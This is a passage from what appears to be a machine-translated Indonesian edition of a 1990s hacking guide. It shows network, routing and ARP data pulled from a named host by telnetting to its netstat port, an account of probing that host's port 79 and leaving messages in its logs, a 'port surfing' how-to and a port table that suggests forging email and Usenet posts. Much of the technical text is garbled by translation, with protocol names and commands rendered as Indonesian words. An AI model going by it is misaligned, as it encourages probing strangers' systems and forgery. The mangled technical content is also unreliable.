* (*)
MENDENGARKAN
TCP 0 0 * (SYSTAT)
* (*)
MENDENGARKAN
TCP 0 0 * (BIAYA)
* (*)
MENDENGARKAN
TCP 0 0 * (DAYTIME)
* (*)
MENDENGARKAN
TCP 0 0 * (TIME)
* (*)
MENDENGARKAN
TCP 0 0 * (ECHO)
* (*)
MENDENGARKAN
TCP 0 0 * (DISCARD)
* (*)
MENDENGARKAN

Halaman 135
TCP 0 0 * (PRINTER)
* (*)
MENDENGARKAN
TCP 0 0 * (POP2)
* (*)
MENDENGARKAN
TCP 0 0 * (POP3)
* (*)
MENDENGARKAN
TCP 0 0 * (KERBEROS_MASTER) * (*)
MENDENGARKAN
TCP 0 0 * (KLOGIN)
* (*)
MENDENGARKAN
TCP 0 0 * (KSHELL)
* (*)
MENDENGARKAN
TCP 0 0 GRANDE.NM.ORG (4174) OSO.NM.ORG (X11) DIDIRIKAN
TCP 0 0 GRANDE.NM.ORG (4172) OSO.NM.ORG (X11) DIDIRIKAN
TCP 0 0 GRANDE.NM.ORG (4171) OSO.NM.ORG (X11) DIDIRIKAN
TCP 0 0 * (FS)
* (*)
MENDENGARKAN
UDP 0 0 * (NAMESERVICE) * (*)
UDP 0 0 127.0.0.1 (NAMESERVICE) * (*)
UDP 0 0 GRANDE.NM.OR (NAMESERV) * (*)
UDP 0 0 * (TFTP)
* (*)
UDP 0 0 * (BOOTPS)
* (*)
UDP 0 0 * (KERBEROS)
* (*)
UDP 0 0 127.0.0.1 (KERBEROS) * (*)
UDP 0 0 GRANDE.NM.OR (KERBEROS) * (*)
UDP 0 0 * (*)
* (*)
UDP 0 0 * (SNMP)
* (*)
UDP 0 0 * (RPC)
* (*)
UDP 0 0 * (DAYTIME)
* (*)
UDP 0 0 * (ECHO)
* (*)
UDP 0 0 * (DISCARD)
* (*)
UDP 0 0 * (WAKTU)
* (*)
UDP 0 0 * (BIAYA)
* (*)
UDP 0 0 * (BICARA)
* (*)
UDP 0 0 * (NTALK)
* (*)
UDP 0 0 * (1023)
* (*)
UDP 0 0 * (XDMCP)
* (*)
Program RPC terdaftar MultiNet:
Port Protokol Versi Program
------- ------- -------- ----
PORTMAP 2 TCP 111
PORTMAP 2 UDP 111
Tabel Routing IP MultiNet:
Flags Gateway Gateway Tujuan Menggunakan Antarmuka MTU
---------- ---------- ----- ------ ----- --------- ----
198.59.167.1 LAWRII.NM.ORG Up, Gateway, H 0 2 se0 1500
166.45.0.1 ENSS365.NM.ORG Up, Gateway, H 0 4162 se0 1500
205.138.138.1 ENSS365.NM.ORG Up, Gateway, H 0 71 se0 1500
204.127.160.1 ENSS365.NM.ORG Up, Gateway, H 0 298 se0 1500
127.0.0.1 127.0.0.1 Naik, Host 5 1183513 lo0 4136
198.59.167.2 LAWRII.NM.ORG Up, Gateway, H 0 640 se0 1500
192.132.89.2 ENSS365.NM.ORG Up, Gateway, H 0 729 se0 1500
207.77.56.2 ENSS365.NM.ORG Up, Gateway, H 0 5 se0 1500
204.97.213.2 ENSS365.NM.ORG Up, Gateway, H 0 2641 se0 1500
194.90.74.66 ENSS365.NM.ORG Up, Gateway, H 0 1 se0 1500
204.252.102.2 ENSS365.NM.ORG Up, Gateway, H 0 109 se0 1500
205.160.243.2 ENSS365.NM.ORG Up, Gateway, H 0 78 se0 1500
202.213.4.2 ENSS365.NM.ORG Naik, Gateway, H 0 4 se0 1500

Halaman 136
202.216.224.66 ENSS365.NM.ORG Up, Gateway, H 0 113 se0 1500
192.132.89.3 ENSS365.NM.ORG Up, Gateway, H 0 1100 se0 1500
198.203.196.67 ENSS365.NM.ORG Up, Gateway, H 0 385 se0 1500
160.205.13.3 ENSS365.NM.ORG Naik, Gateway, H 0 78 se0 1500
202.247.107.131 ENSS365.NM.ORG Up, Gateway, H 0 19 se0 1500
198.59.167.4 LAWRII.NM.ORG Up, Gateway, H 0 82 se0 1500
128.148.157.6 ENSS365.NM.ORG Up, Gateway, H 0 198 se0 1500
160.45.10.6 ENSS365.NM.ORG Naik, Gateway, H 0 3 se0 1500
128.121.50.7 ENSS365.NM.ORG Naik, Gateway, H 0 3052 se0 1500
206.170.113.8 ENSS365.NM.ORG Naik, Gateway, H 0 1451 se0 1500
128.148.128.9 ENSS365.NM.ORG Up, Gateway, H 0 1122 se0 1500
203.7.132.9 ENSS365.NM.ORG Up, Gateway, H 0 14 se0 1500
204.216.57.10 ENSS365.NM.ORG Naik, Gateway, H 0 180 se0 1500
130.74.1.75 ENSS365.NM.ORG Naik, Gateway, H 0 10117 se0 1500
206.68.65.15 ENSS365.NM.ORG Up, Gateway, H 0 249 se0 1500
129.219.13.81 ENSS365.NM.ORG Up, Gateway, H 0 547 se0 1500
204.255.246.18 ENSS365.NM.ORG Up, Gateway, H 0 1125 se0 1500
160.45.24.21 ENSS365.NM.ORG Up, Gateway, H 0 97 se0 1500
206.28.168.21 ENSS365.NM.ORG Up, Gateway, H 0 2093 se0 1500
163.179.3.222 ENSS365.NM.ORG Up, Gateway, H 0 315 se0 1500
198.109.130.33 ENSS365.NM.ORG Up, Gateway, H 0 1825 se0 1500
199.224.108.33 ENSS365.NM.ORG Up, Gateway, H 0 11362 se0 1500
203.7.132.98 ENSS365.NM.ORG Up, Gateway, H 0 73 se0 1500
198.111.253.35 ENSS365.NM.ORG Up, Gateway, H 0 1134 se0 1500
206.149.24.100 ENSS365.NM.ORG Up, Gateway, H 0 3397 se0 1500
165.212.105.106 ENSS365.NM.ORG Up, Gateway, H 0 17 se0 1006
205.238.3.241 ENSS365.NM.ORG Up, Gateway, H 0 69 se0 1500
198.49.44.242 ENSS365.NM.ORG Up, Gateway, H 0 25 se0 1500
194.22.188.242 ENSS365.NM.ORG Up, Gateway, H 0 20 se0 1500
164.64.0 LAWRII.NM.ORG Up, Gateway 1 40377 se0 1500
0,0.0
ENSS365.NM.ORG Naik, Gateway 2 4728741 se0 1500
207.66.1 GLORY.NM.ORG Up, Gateway 0 51 se0 1500
205.166.1 GLORY.NM.ORG Up, Gateway 0 1978 se0 1500
204.134.1 LAWRII.NM.ORG Up, Gateway 0 54 se0 1500
204.134.2 GLORY.NM.ORG Up, Gateway 0 138 se0 1500
192.132.2 129.121.248.1 Atas, Gateway 0 6345 se0 1500
204.134.67 GLORY.NM.ORG Up, Gateway 0 2022 se0 1500
206.206.67 GLORY.NM.ORG Up, Gateway 0 7778 se0 1500
206.206.68 LAWRII.NM.ORG Up, Gateway 0 3185 se0 1500
207.66.5 GLORY.NM.ORG Up, Gateway 0 626 se0 1500
204.134.69 GLORY.NM.ORG Up, Gateway 0 7990 se0 1500
207.66.6 GLORY.NM.ORG Up, Gateway 0 53 se0 1500
204.134.70 LAWRII.NM.ORG Up, Gateway 0 18011 se0 1500
192.188.135 GLORY.NM.ORG Up, Gateway 0 5 se0 1500
206.206.71 LAWRII.NM.ORG Up, Gateway 0 2 se0 1500
204.134.7 GLORY.NM.ORG Up, Gateway 0 38 se0 1500
199.89.135 GLORY.NM.ORG Up, Gateway 0 99 se0 1500
198.59.136 LAWRII.NM.ORG Up, Gateway 0 1293 se0 1500
204.134.9 GLORY.NM.ORG Up, Gateway 0 21 se0 1500
204.134.73 GLORY.NM.ORG Up, Gateway 0 59794 se0 1500
129.138.0 GLORY.NM.ORG Up, Gateway 0 5262 se0 1500
192.92.10 LAWRII.NM.ORG Up, Gateway 0 163 se0 1500
206.206.75 LAWRII.NM.ORG Up, Gateway 0 604 se0 1500
207.66.13 GLORY.NM.ORG Up, Gateway 0 1184 se0 1500

Halaman 137
204.134.77 LAWRII.NM.ORG Up, Gateway 0 3649 se0 1500
207.66.14 GLORY.NM.ORG Up, Gateway 0 334 se0 1500
204.134.78 GLORY.NM.ORG Up, Gateway 0 239 se0 1500
204.52.207 GLORY.NM.ORG Up, Gateway 0 293 se0 1500
204.134.79 GLORY.NM.ORG Up, Gateway 0 1294 se0 1500
192.160.144 LAWRII.NM.ORG Up, Gateway 0 117 se0 1500
206.206.80 PENNY.NM.ORG Up, Gateway 0 4663 se0 1500
204.134.80 GLORY.NM.ORG Up, Gateway 0 91 se0 1500
198.99.209 LAWRII.NM.ORG Up, Gateway 0 1136 se0 1500
207.66.17 GLORY.NM.ORG Up, Gateway 0 24173 se0 1500
204.134.82 GLORY.NM.ORG Up, Gateway 0 29766 se0 1500
192.41.211 GLORY.NM.ORG Up, Gateway 0 155 se0 1500
192.189.147 LAWRII.NM.ORG Up, Gateway 0 3133 se0 1500
204.134.84 PENNY.NM.ORG Up, Gateway 0 189 se0 1500
204.134.87 LAWRII.NM.ORG Up, Gateway 0 94 se0 1500
146.88.0 GLORY.NM.ORG Up, Gateway 0 140 se0 1500
192.84.24 GLORY.NM.ORG Up, Gateway 0 3530 se0 1500
204.134.88 LAWRII.NM.ORG Up, Gateway 0 136 se0 1500
198.49.217 GLORY.NM.ORG Up, Gateway 0 303 se0 1500
192.132.89 GLORY.NM.ORG Up, Gateway 0 3513 se0 1500
198.176.219 GLORY.NM.ORG Up, Gateway 0 1278 se0 1500
206.206.92 LAWRII.NM.ORG Up, Gateway 0 1228 se0 1500
192.234.220 129.121.1.91 Up, Gateway 0 2337 se0 1500
204.134.92 LAWRII.NM.ORG Up, Gateway 0 13995 se0 1500
198.59.157 LAWRII.NM.ORG Up, Gateway 0 508 se0 1500
206.206.93 GLORY.NM.ORG Up, Gateway 0 635 se0 1500
204.134.93 GLORY.NM.ORG Up, Gateway 0 907 se0 1500
198.59.158 LAWRII.NM.ORG Up, Gateway 0 14214 se0 1500
198.59.159 LAWRII.NM.ORG Up, Gateway 0 1806 se0 1500
204.134.95 PENNY.NM.ORG Up, Gateway 0 3644 se0 1500
206.206.96 GLORY.NM.ORG Up, Gateway 0 990 se0 1500
206.206.161 LAWRII.NM.ORG Up, Gateway 0 528 se0 1500
198.59.97 PENNY.NM.ORG Up, Gateway 0 55 se0 1500
198.59.161 LAWRII.NM.ORG Up, Gateway 0 497 se0 1500
192.207.226 GLORY.NM.ORG Up, Gateway 0 93217 se0 1500
198.59.99 PENNY.NM.ORG Up, Gateway 0 2 se0 1500
198.59.163 GLORY.NM.ORG Up, Gateway 0 3379 se0 1500
192.133.100 LAWRII.NM.ORG Up, Gateway 0 3649 se0 1500
204.134.100 GLORY.NM.ORG Up, Gateway 0 8 se0 1500
128.165.0 PENNY.NM.ORG Up, Gateway 0 15851 se0 1500
198.59.165 GLORY.NM.ORG Up, Gateway 0 274 se0 1500
206.206.165 LAWRII.NM.ORG Up, Gateway 0 167 se0 1500
206.206.102 GLORY.NM.ORG Up, Gateway 0 5316 se0 1500
160.230.0 LAWRII.NM.ORG Up, Gateway 0 19408 se0 1500
206.206.166 LAWRII.NM.ORG Up, Gateway 0 1756 se0 1500
205.166.231 GLORY.NM.ORG Up, Gateway 0 324 se0 1500
198.59.167 GLORY.NM.ORG Up, Gateway 0 1568 se0 1500
206.206.103 GLORY.NM.ORG Up, Gateway 0 3629 se0 1500
198.59.168 GLORY.NM.ORG Up, Gateway 0 9063 se0 1500
206.206.104 GLORY.NM.ORG Up, Gateway 0 7333 se0 1500
206.206.168 GLORY.NM.ORG Up, Gateway 0 234 se0 1500
204.134.105 LAWRII.NM.ORG Up, Gateway 0 4826 se0 1500
206.206.105 LAWRII.NM.ORG Up, Gateway 0 422 se0 1500
204.134.41 LAWRII.NM.ORG Up, Gateway 0 41782 se0 1500

Halaman 138
206.206.169 GLORY.NM.ORG Up, Gateway 0 5101 se0 1500
204.134.42 GLORY.NM.ORG Up, Gateway 0 10761 se0 1500
206.206.170 GLORY.NM.ORG Up, Gateway 0 916 se0 1500
198.49.44 GLORY.NM.ORG Up, Gateway 0 3 se0 1500
198.59.108 GLORY.NM.ORG Up, Gateway 0 2129 se0 1500
204.29.236 GLORY.NM.ORG Up, Gateway 0 125 se0 1500
206.206.172 GLORY.NM.ORG Up, Gateway 0 5839 se0 1500
204.134.108 GLORY.NM.ORG Up, Gateway 0 3216 se0 1500
206.206.173 GLORY.NM.ORG Up, Gateway 0 374 se0 1500
198.175.173 LAWRII.NM.ORG Up, Gateway 0 6227 se0 1500
198.59.110 GLORY.NM.ORG Up, Gateway 0 1797 se0 1500
198.51.238 GLORY.NM.ORG Up, Gateway 0 1356 se0 1500
192.136.110 GLORY.NM.ORG Up, Gateway 0 583 se0 1500
204.134.48 GLORY.NM.ORG Up, Gateway 0 42 se0 1500
198.175.176 LAWRII.NM.ORG Up, Gateway 0 32 se0 1500
206.206.114 LAWRII.NM.ORG Up, Gateway 0 44 se0 1500
206.206.179 LAWRII.NM.ORG Up, Gateway 0 14 se0 1500
198.59.179 PENNY.NM.ORG Up, Gateway 0 222 se0 1500
198.59.115 GLORY.NM.ORG Up, Gateway 1 132886 se0 1500
206.206.181 GLORY.NM.ORG Up, Gateway 0 1354 se0 1500
206.206.182 SIENNA.NM.ORG Up, Gateway 0 16 se0 1500
206.206.118 GLORY.NM.ORG Up, Gateway 0 3423 se0 1500
206.206.119 GLORY.NM.ORG Up, Gateway 0 282 se0 1500
206.206.183 SIENNA.NM.ORG Up, Gateway 0 2473 se0 1500
143.120.0 LAWRII.NM.ORG Up, Gateway 0 123533 se0 1500
206.206.184 GLORY.NM.ORG Up, Gateway 0 1114 se0 1500
205.167.120 GLORY.NM.ORG Up, Gateway 0 4202 se0 1500
206.206.121 GLORY.NM.ORG Up, Gateway 1 71 se0 1500
129.121.0 GRANDE.NM.ORG Naik
12 21658599 se0 1500
204.134.122 GLORY.NM.ORG Up, Gateway 0 195 se0 1500
204.134.58 GLORY.NM.ORG Up, Gateway 0 7707 se0 1500
128.123.0 GLORY.NM.ORG Up, Gateway 0 34416 se0 1500
204.134.59 GLORY.NM.ORG Up, Gateway 0 1007 se0 1500
204.134.124 GLORY.NM.ORG Up, Gateway 0 37160 se0 1500
206.206.124 LAWRII.NM.ORG Up, Gateway 0 79 se0 1500
206.206.125 PENNY.NM.ORG Up, Gateway 0 233359 se0 1500
204.134.126 GLORY.NM.ORG Up, Gateway 0 497 se0 1500
206.206.126 LAWRII.NM.ORG Up, Gateway 0 13644 se0 1500
204.69.190 GLORY.NM.ORG Up, Gateway 0 4059 se0 1500
206.206.190 GLORY.NM.ORG Up, Gateway 0 1630 se0 1500
204.134.127 GLORY.NM.ORG Up, Gateway 0 45621 se0 1500
206.206.191 GLORY.NM.ORG Up, Gateway 0 3574 se0 1500
Tabel Routing MultiNet IPX:
Flags Gateway Gateway Tujuan Menggunakan Antarmuka MTU
---------- ---------- ----- ------ ----- --------- ----
Tabel ARP MultiNet:
Alamat Jaringan Host
Bendera Alamat Arp Ethernet
-------------------------------------------- ------ ---------- ---------
GLORY.NM.ORG (IP 129.121.1.4)
AA: 00: 04: 00: 61: D0 Sementara
[TIDAK DIKETAHUI] (IP 129.121.251.1)
00: C0: 05: 01: 2C: D2 Temporary
NARANJO.NM.ORG (IP 129.121.1.56)
08:00: 87: 04: 9F: 42 Sementara
CHAMA.NM.ORG (IP 129.121.1.8)
AA: 00: 04: 00: 0C: D0 Sementara

Halaman 139
[TIDAK DIKETAHUI] (IP 129.121.251.5)
AA: 00: 04: 00: D2: D0 Sementara
LAWRII.NM.ORG (IP 129.121.254.10)
AA: 00: 04: 00: 5C: D0 Sementara
[TIDAK DIKETAHUI] (IP 129.121.1.91)
00: C0: 05: 01: 2C: D2 Temporary
BRAVO.NM.ORG (IP 129.121.1.6)
AA: 00: 04: 00: 0B: D0 Sementara
PENNY.NM.ORG (IP 129.121.1.10)
AA: 00: 04: 00: 5F: D0 Sementara
ARRIBA.NM.ORG (IP 129.121.1.14)
08:00: 2B: BC: C1: A7 Sementara
AZUL.NM.ORG (IP 129.121.1.51)
08:00: 87: 00: A1: D3 Sementara
ENSS365.NM.ORG (IP 129.121.1.3)
00:00: 0C: 51: EF: 58 Sementara
AVATAR.NM.ORG (IP 129.121.254.1)
08:00: 5A: 1D: 52: 0D Sementara
[TIDAK DIKETAHUI] (IP 129.121.253.2)
08:00: 5A: 47: 4A: 1D Sementara
[TIDAK DIKETAHUI] (IP 129.121.254.5)
00: C0: 7B: 5F: 5F: 80 Sementara
CONCHAS.NM.ORG (IP 129.121.1.11)
08:00: 5A: 47: 4A: 1D Sementara
[TIDAK DIKETAHUI] (IP 129.121.253.10)
AA: 00: 04: 00: 4B: D0 Sementara
Statistik Antarmuka Jaringan MultiNet:
Nama Alamat Jaringan Mtu
Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- - ----
se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0
lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0
Statistik Protokol MultiNet:
65264173 paket IP diterima
22 paket IP lebih kecil dari ukuran minimum
6928 fragmen IP diterima
4 fragmen IP habis waktu
34 IP diterima untuk tujuan yang tidak terjangkau
704140 paket kesalahan ICMP dihasilkan
9667 ICMP opcodes di luar jangkauan
4170 Checksum paket ICMP salah
734363 tanggapan ICMP
734363 paket ICMP "Echo" diterima
734363 paket ICMP "Echo Reply" terkirim
18339 Paket ICMP "Echo Balas" diterima
704140 paket ICMP "Destination Unreachable" terkirim
451243 paket ICMP "Destination Unreachable" diterima
1488 paket ICMP "Source Quench" diterima
163911 paket ICMP "ReDirect" diterima
189732 paket ICMP "Time Exceeded" diterima
126966 koneksi TCP dimulai
233998 koneksi TCP dibuat
132611 Koneksi TCP diterima
67972 koneksi TCP terputus
28182 koneksi TCP embrionik terputus
269399 koneksi TCP ditutup
10711838 Segmen TCP waktunya untuk RTT
10505140 Segmen TCP memperbarui RTT
3927264 TCP menunda ACK yang dikirim
666 koneksi TCP terputus karena pengiriman ulang timeout
111040 waktu transmisi ulang TCP
3136 TCP bertahan timeout
9 koneksi TCP yang bertahan turun
16850 batas waktu keepalive TCP
1195 Proxy keepalive TCP terkirim

Halaman 140
14392 Koneksi TCP turun karena batas waktu keepalive
28842663 paket TCP dikirim
12714484 paket data TCP dikirim
1206060086 byte data TCP dikirim
58321 paket data TCP dikirim ulang
22144036 byte data TCP dikirim ulang
6802199 Paket TCP ACK hanya dikirim
1502 probe jendela TCP dikirim
483 paket TCP URG saja yang dikirim
8906175 Paket TCP Window-Update-only yang dikirim
359509 paket kontrol TCP dikirim
38675084 paket TCP diterima
28399363 paket TCP diterima secara berurutan
1929418386 byte TCP diterima secara berurutan
25207 paket TCP dengan kesalahan checksum
273374 paket TCP adalah duplikat
230525708 byte TCP adalah duplikat
Paket TCP 3748 memiliki beberapa byte duplikat
493214 byte TCP adalah duplikat parsial
2317156 paket TCP rusak
3151204672 byte TCP kami rusak
1915 paket TCP memiliki data setelah jendela
865443 byte TCP adalah setelah jendela
5804 paket TCP untuk koneksi yang sudah ditutup
941 paket TCP adalah probe jendela
10847459 paket TCP memiliki ACK
Paket 222657 TCP memiliki ACK duplikat
1 paket TCP ACKed data yang tidak terkirim
1200274739 byte TCP ACKed
141545 paket TCP memiliki pembaruan jendela
13 segmen TCP turun karena PAWS
4658158 segmen TCP diprediksi murni-ACK
24033756 segmen TCP diprediksi murni-data
8087980 TCP PCB cache missses
305 Checksum header UDP buruk
17 bidang panjang data UDP buruk
23772272 cache UDP PCB meleset
Statistik Penyangga MultiNet:
388 dari 608 buffer yang digunakan:
30 buffer dialokasikan untuk Data.
10 buffer dialokasikan untuk Packet Header.
66 buffer dialokasikan untuk Struktur Soket.
57 buffer dialokasikan untuk Blok Kontrol Protokol.
163 buffer dialokasikan untuk Entri Tabel Perutean.
2 buffer dialokasikan untuk Nama dan Alamat Socket.
48 buffer dialokasikan untuk Kernel Fork-Processes.
2 buffer dialokasikan untuk Alamat Antarmuka.
1 buffer dialokasikan untuk Alamat Multicast.
1 buffer dialokasikan untuk Callback Timeout.
6 buffer dialokasikan untuk Manajemen Memori.
2 buffer dialokasikan untuk Blok Kontrol TTY Jaringan.
11 dari 43 halaman cluster digunakan.
11 CXB yang dipinjam dari driver perangkat VMS

Halaman 141
2 CXB menunggu untuk kembali ke driver perangkat VMS
162 Kbytes dialokasikan untuk buffer MultiNet (44% digunakan).
226 Kbytes ruang alamat penyangga yang dialokasikan (0% dari maksimum).
Koneksi ditutup oleh tuan rumah asing.
<slug> [68] ->
Wah! Apa itu tadi?
Apa yang kami lakukan adalah telnet ke port 15 - port netstat - yang pada beberapa komputer menjalankan daemon yang
memberitahu
siapa pun yang peduli untuk masuk tentang segala hal tentang koneksi yang dibuat oleh semua komputer yang terhubung
ke Internet melalui komputer ini.
Jadi dari ini kami belajar dua hal:
1) Grande.nm.org adalah komputer yang sangat sibuk dan penting.
2) Bahkan komputer yang sangat sibuk dan penting dapat membiarkan surfer port acak datang dan bermain.
Jadi teman wanita saya ingin mencoba port lain. Saya menyarankan port jari, nomor 79. Jadi dia memberi
perintah:
<slug> [68] -> telnet grande.nm.org 79
Mencoba 129.121.1.2 ...
Terhubung ke grande.nm.org.
Karakter melarikan diri adalah '^]'.
jari
? Maaf, tidak dapat menemukan "JARI"
Koneksi ditutup oleh tuan rumah asing.
<slug> [69] -> telnet grande.nm.org 79
Mencoba 129.121.1.2 ...
Terhubung ke grande.nm.org.
Karakter melarikan diri adalah '^]'.
membantu
? Maaf, tidak dapat menemukan "BANTUAN"
Koneksi ditutup oleh tuan rumah asing.
<slug> [69] -> telnet grande.nm.org 79
Mencoba 129.121.1.2 ...
Terhubung ke grande.nm.org.
Karakter melarikan diri adalah '^]'.
?
? Maaf, tidak dapat menemukan "?"
Koneksi ditutup oleh tuan rumah asing.
<slug> [69] -> telnet grande.nm.org 79
Mencoba 129.121.1.2 ...
Terhubung ke grande.nm.org.
Karakter melarikan diri adalah '^]'.
pria
? Maaf, tidak dapat menemukan "MAN"
Koneksi ditutup oleh tuan rumah asing.
<slug> [69] ->
Pada awalnya ini terlihat seperti hanya sekelompok perintah yang gagal. Tapi sebenarnya ini cukup menarik. Alasannya adalah
port 79 itu, di bawah aturan IETF, seharusnya menjalankan fingerd, daemon jari. Jadi ketika dia memberi

Halaman 142
perintah "jari" dan grande.nm.org berkata? Maaf, tidak dapat menemukan "JARI," kami tahu port ini tidak
mengikuti aturan IETF.
Sekarang di komputer mungkin mereka tidak menjalankan daemon jari sama sekali. Ini karena jari memiliki sifat yang demikian
dapat digunakan untuk mendapatkan kontrol total dari komputer yang menjalankannya.
Tetapi jika jari dimatikan, dan tidak ada lagi yang berjalan pada port 79, kami akan mendapatkan jawabannya:
telnet: terhubung: Sambungan ditolak.
Tetapi alih-alih kami terhubung dan grande.nm.org sedang menunggu perintah.
Sekarang hal normal yang dilakukan oleh surfer port ketika menjalankan daemon yang tidak mili adalah membujuknya untuk
mengungkapkan apa
perintah yang digunakannya. “Tolong,” “?” Dan “laki-laki” sering bekerja. Tapi itu tidak membantu kami.
Tetapi meskipun perintah ini tidak membantu kami, mereka memberi tahu kami bahwa daemon itu mungkin sesuatu
peka. Jika itu adalah dasmon yang dimaksudkan untuk digunakan oleh siapa saja dan saudaranya, itu akan memberi kita
instruksi.
Jadi apa yang kita lakukan selanjutnya? Kami memutuskan untuk menjadi warga internet yang baik dan juga keluar dari penjara.
Kami memutuskan untuk melakukannya
beter log off.
Tapi ada satu peretasan yang kami putuskan untuk dilakukan pertama kali: tinggalkan tanda kami pada file log shell.
File log shell menyimpan semua perintah sistem operasi yang dibuat di komputer. Admin admin
komputer yang jelas penting seperti grande.nm.org mungkin cukup kompeten untuk memindai catatan
perintah apa yang diberikan oleh siapa ke komputernya. Terutama pada port yang cukup penting untuk dijalankan
sebuah misteri, daemon non-IETF. Jadi semua yang kita ketik saat terhubung disimpan di log.
Jadi teman saya terkikik dengan gembira dan meninggalkan beberapa pesan di port 79 sebelum log off. Oh, sayang, aku percaya
dia kecanduan peretasan. Hmmm, itu bisa menjadi cara yang baik untuk bertemu sysadmin lucu ...
Jadi, port surf sudah habis! Jika Anda ingin berselancar, inilah dasarnya:
1) Dapatkan masuk ke akun shell. Itu adalah akun dengan ISP Anda yang memungkinkan Anda memberikan perintah Unix. Atau
--
jalankan Linux atau sejenis Unix lainnya di PC Anda dan hubungkan ke Internet.
2) Berikan perintah "telnet <hostname> <pot number>" di mana <hostname> adalah alamat internet dari
komputer yang ingin Anda kunjungi dan <nomor port> adalah apa pun yang terlihat seperti Anda.
3) Jika Anda mendapatkan respons “terhubung ke <hostname>,” maka selancarlah!
Berikut ini adalah beberapa port favorit saya. Adalah sah dan tidak berbahaya untuk membayar mereka kunjungan selama Anda
tidak
mencari tahu cara mendapatkan status pengguna super saat bermain dengan mereka. Namun, harap dicatat bahwa jika Anda
melakukannya juga
banyak port yang berselancar dari akun shell Anda, sysadmin Anda mungkin memperhatikan ini di file log shell-nya. Jika dia
atau
dia berprasangka terhadap peretasan, Anda mungkin ditendang dari ISP Anda. Jadi, Anda mungkin ingin menjelaskan terlebih
dahulu
bahwa Anda hanyalah seorang hacker yang tidak berbahaya yang ingin bersenang-senang, eh, um, pelajari tentang Unix. Ya, itu
kedengarannya bagus...
Layanan nomor port Mengapa phun!
7 echo Apapun yang Anda ketik, host mengulangi kembali kepada Anda, digunakan untuk ping
9 buang Dev / null - seberapa cepat Anda bisa mengetahui yang ini?

Halaman 143
11 systat Banyak info tentang pengguna
13 siang Waktu dan tanggal di lokasi komputer
15 netstat Info luar biasa di jaringan tetapi jarang digunakan lagi
19 chargen Tuangkan aliran karakter ASCII. Gunakan ^ C untuk berhenti.
21 ftp Mentransfer file
Login shell aman 22 ssh - terowongan terenkripsi
23 telnet Di mana Anda login jika Anda tidak menggunakan ssh :)
25 smpt Forge email from Bill.Gates@Microsoft.org.
37 waktu
39 rlp Lokasi sumber daya
43 whois Info pada host dan jaringan
53 Nameserver domain
70 gopher Pemburu info kedaluwarsa
79 jari Banyak info tentang pengguna
80 http server web
110 pop Email masuk
119 nntp Grup berita Usenet - memalsukan posting, membatalkan
443 shttp Server web lain
512 biff Mail notification
513 rlogin Login jauh
yang terpencil siapa dan uptime
514 shell Remote command, tidak ada kata sandi yang digunakan!
syslog Pencatatan sistem jarak jauh - bagaimana kita mengatasi peretas
520 rute Protokol informasi routing
**************************
Kiat kepala baling-baling: Perhatikan bahwa dalam kebanyakan kasus host Internet akan menggunakan penetapan nomor port ini
untuk ini
jasa. Lebih dari satu layanan juga dapat ditugaskan secara bersamaan ke port yang sama. Penomoran ini
sistem secara sukarela ditawarkan oleh Internet Engineering Task Force (IETF). Itu artinya Internet
host dapat menggunakan port lain untuk layanan ini. Mengharapkan yang tak terduga!

Halaman 144
Jika Anda memiliki salinan Linux, Anda bisa mendapatkan daftar semua tugas IETF nomor port dalam file
/ etc / services.
Isi Volume 3:
Bagaimana melindungi diri Anda dari bom email!
Cara memetakan Internet.
Bagaimana agar tidak diusir dari IRC!
Cara Membaca Header Email dan Menemukan Host Internet
Dread GTMHH tentang Cracking
Bagaimana Menjadi Pahlawan di Lab Komputer
________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 3 Nomor 1
Bagaimana melindungi diri Anda dari bom email!
________________________________________
Bom email! Orang-orang seperti johnny yang marah, AKA "Unamailer," telah membuat berita belakangan ini dengan
mengaturnya
20 MB atau lebih email - puluhan ribu pesan - setiap hari masuk ke email korbannya
akun.
Pemboman email bisa menjadi berita buruk karena dua alasan. Satu, korban tidak dapat dengan mudah menemukan yang sah
email di tumpukan sampah spam yang besar itu. Dua, banjir pesan mengikat server surat dan mengunyah
bandwidth komunikasi.
Tentu saja, itulah dua alasan utama pembom email melakukan serangan: mengacaukan email orang
dan / atau membahayakan ISP yang mereka targetkan. Bom email adalah senjata umum perang melawan tuan rumah Internet
dikontrol oleh spammer dan penipu. Ini juga digunakan oleh lusers dengan dendam.
Kisah-kisah berita membuatnya terdengar seperti korban pemboman email, ahem, sial. Tapi kami tidak. Kita tahu,
karena marah - pembom email Natal - mengatakan kepada pers bahwa dia menargetkan daftar Happy Hacker
Panglima Tertinggi, Carolyn Meinel. (Seseorang secara bersamaan mencoba mengirim email ke bom Happy
Daftar peretas sendiri tetapi tidak ada yang melangkah maju untuk mengambil kredit untuk upaya ini).
Tapi seperti yang Anda tahu dari fakta bahwa kita mendapatkan Happy Hacker Digest setelah serangan itu, dan oleh fakta itu
Saya terus menjawab email saya, ada cara untuk mengalahkan pembom email.
Sekarang sebagian besar dari ini adalah teknik untuk digunakan oleh para ahli saja. Tetapi jika Anda, seperti kebanyakan dari kita
dalam daftar ini, a
pemula, Anda mungkin dapat memenangkan poin dengan ISP Anda dengan mengirim email kepada orang-orang bantuan teknis
dengan beberapa
informasi dalam panduan ini. Mungkin kemudian mereka akan memaafkan Anda jika file log shell Anda terlihat terlalu sedikit
menarik!
Garis pertahanan pertama saya adalah menggunakan beberapa layanan online. Dengan begitu, setiap kali satu akun mendapatkan
dibajak, dibom, dll., saya bisa mengirim email kepada semua koresponden saya dan memberi tahu mereka di mana harus
menghubungi saya. Sekarang saya tidak pernah
telah dibom untuk tunduk, tetapi saya telah diretas dengan buruk dan cukup sering sehingga saya harus membuangnya
ISP dengan jijik. Atau, ISP mungkin menjadi sedikit cemas atas eksperimen peretasan Anda. Jadi itu ide yang bagus
bersiap-siap untuk melompat akun.
Tapi itu cara yang bagus untuk menangani pemboman email. Selain itu, seorang anggota daftar Happy Hacker mengatakan
bahwa alasan johnny yang marah tidak mengirim email ke bom semua akun yang paling sering saya gunakan adalah karena dia

Halaman 145
membujuk johnny untuk membom satu saja untuk tujuan publisitas. Tetapi bahkan jika johnny telah mengebom semua favorit
saya
akun, saya bisa kembali berdiri dengan tergesa-gesa.
Ada beberapa cara agar ISP Anda atau Anda dapat mengalahkan serangan ini.
Pertahanan paling sederhana adalah bagi ISP Anda untuk memblokir bom surat di router. Ini hanya berfungsi, bagaimanapun,
jika
